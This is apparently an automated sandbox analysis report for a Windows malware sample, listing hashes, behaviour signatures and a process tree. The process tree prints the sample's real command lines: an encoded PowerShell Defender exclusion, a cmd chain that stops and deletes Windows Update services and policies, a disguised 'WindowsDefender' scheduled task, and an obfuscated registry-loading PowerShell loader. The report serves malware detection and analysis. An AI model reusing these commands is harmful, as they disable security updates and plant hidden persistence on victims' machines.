Analysis
-
max time kernel
300s -
max time network
284s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
29-08-2022 22:20
Static task
static1
Behavioral task
behavioral1
Sample
bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494.exe
Resource
win7-20220812-en
General
-
Target
bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494.exe
-
Size
5.1MB
-
MD5
2438b851e157a3f70bd48af1984b2139
-
SHA1
105ce31ecdce604bf8629ddc6580f2ad25fc21b5
-
SHA256
bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494
-
SHA512
ff1ba2eee03a981744434984d431f022afee988745a54d268c39df258502ba57d9880c916050370e351a709ab42928c0a7c3665a7b80b384e9832841e3d76c52
-
SSDEEP
98304:hoJgPPz4jnKiw6qbse0KZ3U/TUpm9OMtUdvHW4i/6jUH2+9Nx40u:onKl6qgeUoSOdPZi/GUH2QX40u
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
Processes:
powershell.EXEsc.exedescription pid process target process PID 1792 created 420 1792 powershell.EXE winlogon.exe PID 1444 created 420 1444 sc.exe winlogon.exe -
Drops file in Drivers directory 2 IoCs
Processes:
conhost.execonhost.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe -
Executes dropped EXE 3 IoCs
Processes:
conhost.exeupdate.exedialer.exepid process 1588 conhost.exe 2016 update.exe 1356 dialer.exe -
Possible privilege escalation attempt 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 1440 takeown.exe 1848 icacls.exe 300 takeown.exe 1608 icacls.exe -
Sets service image path in registry 2 TTPs 1 IoCs
Processes:
services.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinRing0_1_2_0\ImagePath = "\\??\\C:\\Program Files\\Google\\Libs\\WR64.sys" services.exe -
Stops running service(s) 3 TTPs
-
Deletes itself 1 IoCs
Processes:
cmd.exepid process 1904 cmd.exe -
Loads dropped DLL 1 IoCs
Processes:
taskeng.exepid process 1180 taskeng.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
icacls.exetakeown.exeicacls.exetakeown.exepid process 1608 icacls.exe 1440 takeown.exe 1848 icacls.exe 300 takeown.exe -
Drops file in System32 directory 7 IoCs
Processes:
powershell.exepowershell.EXEpowershell.EXEpowershell.exesvchost.execonhost.exeWMIADAP.EXEdescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\Tasks\WindowsDefender svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\1C19.tmp conhost.exe File created C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini WMIADAP.EXE -
Suspicious use of SetThreadContext 4 IoCs
Processes:
conhost.exepowershell.EXEsc.execonhost.exedescription pid process target process PID 748 set thread context of 1588 748 conhost.exe conhost.exe PID 1792 set thread context of 1696 1792 powershell.EXE dllhost.exe PID 1444 set thread context of 1484 1444 sc.exe dllhost.exe PID 1708 set thread context of 1356 1708 conhost.exe dialer.exe -
Drops file in Program Files directory 3 IoCs
Processes:
conhost.execonhost.exedescription ioc process File created C:\Program Files\Platform\Defender\update.exe conhost.exe File opened for modification C:\Program Files\Platform\Defender\update.exe conhost.exe File created C:\Program Files\Google\Libs\WR64.sys conhost.exe -
Drops file in Windows directory 7 IoCs
Processes:
svchost.execonhost.exedescription ioc process File opened for modification C:\Windows\appcompat\programs\RecentFileCache.bcf svchost.exe File opened for modification C:\Windows\Tasks\dialersvc64.job svchost.exe File opened for modification C:\Windows\Tasks\dialersvc32.job svchost.exe File created C:\Windows\Tasks\dialersvc32.job conhost.exe File opened for modification C:\Windows\Tasks\dialersvc32.job conhost.exe File created C:\Windows\Tasks\dialersvc64.job conhost.exe File opened for modification C:\Windows\Tasks\dialersvc64.job conhost.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 1900 sc.exe 1792 sc.exe 1444 sc.exe 1016 sc.exe 1948 sc.exe 1608 sc.exe 1672 sc.exe 980 sc.exe 1400 sc.exe 552 sc.exe -
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 wmiprvse.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 wmiprvse.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 5 IoCs
Processes:
conhost.exepowershell.EXEdescription ioc process Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" conhost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 104fc55c06bcd801 powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ conhost.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" conhost.exe -
Modifies registry key 1 TTPs 18 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 1192 reg.exe 1940 reg.exe 836 reg.exe 1224 reg.exe 472 reg.exe 1356 reg.exe 1028 reg.exe 1452 reg.exe 1224 reg.exe 688 reg.exe 552 reg.exe 844 reg.exe 1480 reg.exe 2044 reg.exe 1360 reg.exe 980 reg.exe 1196 reg.exe 1236 reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.execonhost.exepowershell.EXEdllhost.exepowershell.EXEsc.exedllhost.exepowershell.exewmiprvse.exepid process 912 powershell.exe 748 conhost.exe 1792 powershell.EXE 1792 powershell.EXE 1696 dllhost.exe 1696 dllhost.exe 1696 dllhost.exe 1696 dllhost.exe 1444 powershell.EXE 1444 sc.exe 1484 dllhost.exe 1484 dllhost.exe 1484 dllhost.exe 1484 dllhost.exe 1696 dllhost.exe 1696 dllhost.exe 1484 dllhost.exe 1484 dllhost.exe 1696 dllhost.exe 1696 dllhost.exe 1484 dllhost.exe 1484 dllhost.exe 1656 powershell.exe 1696 dllhost.exe 1696 dllhost.exe 1484 dllhost.exe 1484 dllhost.exe 1696 dllhost.exe 1696 dllhost.exe 1484 dllhost.exe 1484 dllhost.exe 1484 dllhost.exe 1484 dllhost.exe 1696 dllhost.exe 1696 dllhost.exe 1484 dllhost.exe 1484 dllhost.exe 1696 dllhost.exe 1696 dllhost.exe 1484 dllhost.exe 1484 dllhost.exe 1696 dllhost.exe 1696 dllhost.exe 1484 dllhost.exe 1484 dllhost.exe 1696 dllhost.exe 1696 dllhost.exe 1484 dllhost.exe 1484 dllhost.exe 1696 dllhost.exe 1696 dllhost.exe 1484 dllhost.exe 1484 dllhost.exe 1696 dllhost.exe 1696 dllhost.exe 1484 dllhost.exe 1484 dllhost.exe 1836 wmiprvse.exe 1836 wmiprvse.exe 1696 dllhost.exe 1696 dllhost.exe 1484 dllhost.exe 1484 dllhost.exe 1696 dllhost.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 1276 Explorer.EXE -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
services.exepid process 464 services.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetakeown.execonhost.exepowershell.EXEdllhost.exepowershell.EXEsc.exedllhost.exesvchost.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetakeown.exedescription pid process Token: SeDebugPrivilege 912 powershell.exe Token: SeShutdownPrivilege 780 powercfg.exe Token: SeShutdownPrivilege 1516 powercfg.exe Token: SeShutdownPrivilege 1752 powercfg.exe Token: SeShutdownPrivilege 872 powercfg.exe Token: SeTakeOwnershipPrivilege 1440 takeown.exe Token: SeDebugPrivilege 748 conhost.exe Token: SeDebugPrivilege 1792 powershell.EXE Token: SeDebugPrivilege 1792 powershell.EXE Token: SeDebugPrivilege 1696 dllhost.exe Token: SeDebugPrivilege 1444 powershell.EXE Token: SeDebugPrivilege 1444 sc.exe Token: SeDebugPrivilege 1484 dllhost.exe Token: SeAuditPrivilege 884 svchost.exe Token: SeDebugPrivilege 1656 powershell.exe Token: SeShutdownPrivilege 1508 powercfg.exe Token: SeShutdownPrivilege 776 powercfg.exe Token: SeShutdownPrivilege 1216 powercfg.exe Token: SeShutdownPrivilege 1036 powercfg.exe Token: SeTakeOwnershipPrivilege 300 takeown.exe Token: SeAssignPrimaryTokenPrivilege 884 svchost.exe Token: SeIncreaseQuotaPrivilege 884 svchost.exe Token: SeSecurityPrivilege 884 svchost.exe Token: SeTakeOwnershipPrivilege 884 svchost.exe Token: SeLoadDriverPrivilege 884 svchost.exe Token: SeSystemtimePrivilege 884 svchost.exe Token: SeBackupPrivilege 884 svchost.exe Token: SeRestorePrivilege 884 svchost.exe Token: SeShutdownPrivilege 884 svchost.exe Token: SeSystemEnvironmentPrivilege 884 svchost.exe Token: SeUndockPrivilege 884 svchost.exe Token: SeManageVolumePrivilege 884 svchost.exe Token: SeAssignPrimaryTokenPrivilege 884 svchost.exe Token: SeIncreaseQuotaPrivilege 884 svchost.exe Token: SeSecurityPrivilege 884 svchost.exe Token: SeTakeOwnershipPrivilege 884 svchost.exe Token: SeLoadDriverPrivilege 884 svchost.exe Token: SeSystemtimePrivilege 884 svchost.exe Token: SeBackupPrivilege 884 svchost.exe Token: SeRestorePrivilege 884 svchost.exe Token: SeShutdownPrivilege 884 svchost.exe Token: SeSystemEnvironmentPrivilege 884 svchost.exe Token: SeUndockPrivilege 884 svchost.exe Token: SeManageVolumePrivilege 884 svchost.exe Token: SeAssignPrimaryTokenPrivilege 884 svchost.exe Token: SeIncreaseQuotaPrivilege 884 svchost.exe Token: SeSecurityPrivilege 884 svchost.exe Token: SeTakeOwnershipPrivilege 884 svchost.exe Token: SeLoadDriverPrivilege 884 svchost.exe Token: SeSystemtimePrivilege 884 svchost.exe Token: SeBackupPrivilege 884 svchost.exe Token: SeRestorePrivilege 884 svchost.exe Token: SeShutdownPrivilege 884 svchost.exe Token: SeSystemEnvironmentPrivilege 884 svchost.exe Token: SeUndockPrivilege 884 svchost.exe Token: SeManageVolumePrivilege 884 svchost.exe Token: SeAssignPrimaryTokenPrivilege 884 svchost.exe Token: SeIncreaseQuotaPrivilege 884 svchost.exe Token: SeSecurityPrivilege 884 svchost.exe Token: SeTakeOwnershipPrivilege 884 svchost.exe Token: SeLoadDriverPrivilege 884 svchost.exe Token: SeSystemtimePrivilege 884 svchost.exe Token: SeBackupPrivilege 884 svchost.exe Token: SeRestorePrivilege 884 svchost.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
Explorer.EXEpid process 1276 Explorer.EXE 1276 Explorer.EXE -
Suspicious use of SendNotifyMessage 2 IoCs
Processes:
Explorer.EXEpid process 1276 Explorer.EXE 1276 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494.execonhost.execmd.execmd.execmd.exedescription pid process target process PID 536 wrote to memory of 748 536 bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494.exe conhost.exe PID 536 wrote to memory of 748 536 bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494.exe conhost.exe PID 536 wrote to memory of 748 536 bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494.exe conhost.exe PID 536 wrote to memory of 748 536 bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494.exe conhost.exe PID 748 wrote to memory of 912 748 conhost.exe powershell.exe PID 748 wrote to memory of 912 748 conhost.exe powershell.exe PID 748 wrote to memory of 912 748 conhost.exe powershell.exe PID 748 wrote to memory of 1040 748 conhost.exe cmd.exe PID 748 wrote to memory of 1040 748 conhost.exe cmd.exe PID 748 wrote to memory of 1040 748 conhost.exe cmd.exe PID 748 wrote to memory of 1220 748 conhost.exe cmd.exe PID 748 wrote to memory of 1220 748 conhost.exe cmd.exe PID 748 wrote to memory of 1220 748 conhost.exe cmd.exe PID 1040 wrote to memory of 1016 1040 cmd.exe sc.exe PID 1040 wrote to memory of 1016 1040 cmd.exe sc.exe PID 1040 wrote to memory of 1016 1040 cmd.exe sc.exe PID 1220 wrote to memory of 780 1220 cmd.exe powercfg.exe PID 1220 wrote to memory of 780 1220 cmd.exe powercfg.exe PID 1220 wrote to memory of 780 1220 cmd.exe powercfg.exe PID 1040 wrote to memory of 1948 1040 cmd.exe sc.exe PID 1040 wrote to memory of 1948 1040 cmd.exe sc.exe PID 1040 wrote to memory of 1948 1040 cmd.exe sc.exe PID 1040 wrote to memory of 1608 1040 cmd.exe sc.exe PID 1040 wrote to memory of 1608 1040 cmd.exe sc.exe PID 1040 wrote to memory of 1608 1040 cmd.exe sc.exe PID 748 wrote to memory of 1088 748 conhost.exe cmd.exe PID 748 wrote to memory of 1088 748 conhost.exe cmd.exe PID 748 wrote to memory of 1088 748 conhost.exe cmd.exe PID 1220 wrote to memory of 1516 1220 cmd.exe powercfg.exe PID 1220 wrote to memory of 1516 1220 cmd.exe powercfg.exe PID 1220 wrote to memory of 1516 1220 cmd.exe powercfg.exe PID 1040 wrote to memory of 1672 1040 cmd.exe sc.exe PID 1040 wrote to memory of 1672 1040 cmd.exe sc.exe PID 1040 wrote to memory of 1672 1040 cmd.exe sc.exe PID 1040 wrote to memory of 1900 1040 cmd.exe sc.exe PID 1040 wrote to memory of 1900 1040 cmd.exe sc.exe PID 1040 wrote to memory of 1900 1040 cmd.exe sc.exe PID 1220 wrote to memory of 1752 1220 cmd.exe powercfg.exe PID 1220 wrote to memory of 1752 1220 cmd.exe powercfg.exe PID 1220 wrote to memory of 1752 1220 cmd.exe powercfg.exe PID 1088 wrote to memory of 700 1088 cmd.exe schtasks.exe PID 1088 wrote to memory of 700 1088 cmd.exe schtasks.exe PID 1088 wrote to memory of 700 1088 cmd.exe schtasks.exe PID 1040 wrote to memory of 1196 1040 cmd.exe reg.exe PID 1040 wrote to memory of 1196 1040 cmd.exe reg.exe PID 1040 wrote to memory of 1196 1040 cmd.exe reg.exe PID 1220 wrote to memory of 872 1220 cmd.exe powercfg.exe PID 1220 wrote to memory of 872 1220 cmd.exe powercfg.exe PID 1220 wrote to memory of 872 1220 cmd.exe powercfg.exe PID 1040 wrote to memory of 844 1040 cmd.exe reg.exe PID 1040 wrote to memory of 844 1040 cmd.exe reg.exe PID 1040 wrote to memory of 844 1040 cmd.exe reg.exe PID 1040 wrote to memory of 1236 1040 cmd.exe reg.exe PID 1040 wrote to memory of 1236 1040 cmd.exe reg.exe PID 1040 wrote to memory of 1236 1040 cmd.exe reg.exe PID 1040 wrote to memory of 1192 1040 cmd.exe reg.exe PID 1040 wrote to memory of 1192 1040 cmd.exe reg.exe PID 1040 wrote to memory of 1192 1040 cmd.exe reg.exe PID 1040 wrote to memory of 472 1040 cmd.exe reg.exe PID 1040 wrote to memory of 472 1040 cmd.exe reg.exe PID 1040 wrote to memory of 472 1040 cmd.exe reg.exe PID 1040 wrote to memory of 1440 1040 cmd.exe takeown.exe PID 1040 wrote to memory of 1440 1040 cmd.exe takeown.exe PID 1040 wrote to memory of 1440 1040 cmd.exe takeown.exe
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵
- Sets service image path in registry
- Suspicious behavior: LoadsDriver
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskeng.exetaskeng.exe {6396D06D-12A5-41EE-A6EE-7CC127D4DEBE} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Loads dropped DLL
-
C:\Program Files\Platform\Defender\update.exe"C:\Program Files\Platform\Defender\update.exe"4⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Program Files\Platform\Defender\update.exe"5⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcQBsAHkAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBrAGQAagAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAbABhACMAPgAgAEAAKAAgADwAIwBmAGgAegAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAZwBmAHQAaAAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKQAgADwAIwB5AG4AYgBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAbwAjAD4A"6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE6⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc7⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc7⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv7⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits7⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of SetThreadContext
- Launches sc.exe
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\sc.exesc stop dosvc7⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f7⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f7⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f7⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f7⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f7⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll7⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q7⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f7⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f7⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f7⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f7⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE7⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE7⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE7⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE7⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE7⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE7⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 06⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 07⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 07⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 07⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "WindowsDefender" /tr "\"C:\Program Files\Platform\Defender\update.exe\""6⤵
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe "epzggvhm"6⤵
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe zryhtmslhfgrpc1 6E3sjfZq2rJQaxvLPmXgsBL6xjjYguHWtOpZ+stIdvtFmxXu9Su4ZmZ4m248qJKzYqn0Ua9E3eZCF6KVDnl4Om3mtJYdu2zYxf5VDSOtlwzNI2HELjSSWiBbhmq9nnQLcymNaMLbX6BcVfekXBXlHwtkdZ87kGHVBeHkhms/rlEKec4HZ9wIBVrc9Qi+y2+a3lep8HRZlmoXu5C0nH5vK2Z6XqFAlqh1P1TH9zlUlrSoi8iC8XAKUbdPgbva/qi9DzYr1RVc8QqRoXX8h4GvBaNJoiMytDP1XZ+7BxVOZddNH0XJdiGTlhqmJ6roc2xDtAY0xSKzjDUzaj6VcQ6dE4nGnXfnrH194gWO2Fle+qlRtL5DmSlHKlQNVMEwD+lLyH/56tXiuxnzEBOxWLJZa4aP8Qv/WXczd4ddilDeMPY13j7jZPu5TdLr9XBYda4edqFELpOQYd1Sl2t6HN/f/knReR0toj+9pfBIu/dyltFHYBgH8jIh3ZIp8xo/NopF9P+/CLEQGN4MNrl3tzSKPM88s7KlDiFV5IVDt9y2BSrs52V/tpdfNJYjkFjol69J6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
